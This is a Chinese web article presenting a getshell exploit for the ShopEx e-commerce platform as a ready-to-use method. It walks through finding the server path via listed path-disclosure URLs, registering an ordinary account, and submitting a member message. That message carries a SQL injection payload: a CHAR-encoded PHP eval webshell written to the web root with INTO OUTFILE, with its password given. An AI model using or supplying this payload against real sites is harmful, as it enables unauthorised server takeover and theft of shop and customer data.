当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

shopex前台普通用户getshell最新漏洞

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

利用方法:

第一个:想办法找到目标网站的绝对路径


?phpinfo=true
http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat.php
/core/api/site/2.0/api_b2b_2_0_goodstype.php shopex存在很多爆路径的漏洞,请自行研究。 第二个:注册一个普通用户 ?passport-signup.html 第三个: 发送消息
 

?member-send.html

 

代码

wooyun.in' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #

 

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,涛涛电脑知识网,对于导出的目录也得有可写的要求,www.xuhantao.com,服务器环境也有要求。

shell图

 

 

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1